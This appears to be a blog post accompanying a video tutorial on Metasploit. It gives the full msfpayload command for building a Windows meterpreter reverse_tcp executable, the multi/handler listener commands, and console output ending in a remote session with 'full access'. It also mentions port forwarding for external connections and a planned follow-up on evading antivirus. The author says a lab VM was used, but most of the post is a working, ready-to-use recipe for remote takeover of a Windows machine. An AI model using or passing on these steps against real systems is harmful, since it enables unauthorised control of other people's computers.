A bit of info on The Metasploit Project:
"Metasploit provides useful information and tools for penetration testers, security researchers, and IDS signature developers. This project was created to provide information on exploit techniques and to create a functional knowledgebase for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only. Metasploit is an open source project."
http://www.metasploit.com/
This program is avalible for Windows and Linux (I tried using it on windows and hated it) and is updated about daily.
Its one of the best, free programs for pentesting/exploiting.
In the video i show you how to use the program in Linux if you use it in Windows the commands could be slightly different.
In the video:
I show you how to make a basic Reverse_tcp payload. Open the client and use this code " ./msfpayload windows/meterpreter/reverse_tcp LHOST=<your ip adddress> LPORT=<Your Listening Port> x > /root/<filename.exe>
Explanation:
LHOST is the address of which you what you exe to connect back on to you this can be internal or external ip. To find you internal ip in Linux just open terminal and type "ifconfig" and you shall see it.
LPORT is the port you what your exe to connect back to you on so make sure its forwarded properly.
the line " x > /root/<filename.exe> " is basically saying create an exe " x " and to send it to " > /root/filename.exe " which is your root folder on Linux. This file exe will only work for windows there are the same exploits for other OS but as windows is most common I will use this.
so an example would be this
" ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.66 LPORT=4444 x > /root/reverse_tcp.exe "
There are extra commands which will encode your exe as to help bypass AV (AntiVirus) but I will cover them on a later post as this is intended for the very basic, first glance look at it and how it works.
Next copy the exe you just created to the (victim BOX), if you havent noticed I use a Virtual Machine running Backtrack 4 and XP Pro.
So now we need to open a listener so we can listen for the exe connecting back so that we get a session.
Open Metasploit Console and type this:
"use multi/handler"
"set PAYLOAD windows/meterpreter/reverse_tcp"
"set LHOST 192.168.1.1"
"set LPORT 4444"
"exploit"
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...So now we have a Listening server running, waiting for the connect back.Remember to make LHOST and LPORT your own configuration.
When the exe is clicked and activated you should get the connection and look like this:
msf exploit(handler) > exploit [*] Started reverse handler on port 4444 [*] Starting the payload handler... [*] Sending stage (72346 bytes) [*] Sleeping before handling stage... [*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.2:1060) meterpreter >
Now we have a meterpreter session and have full access :)
0 comments:
Post a Comment
Any Questions...?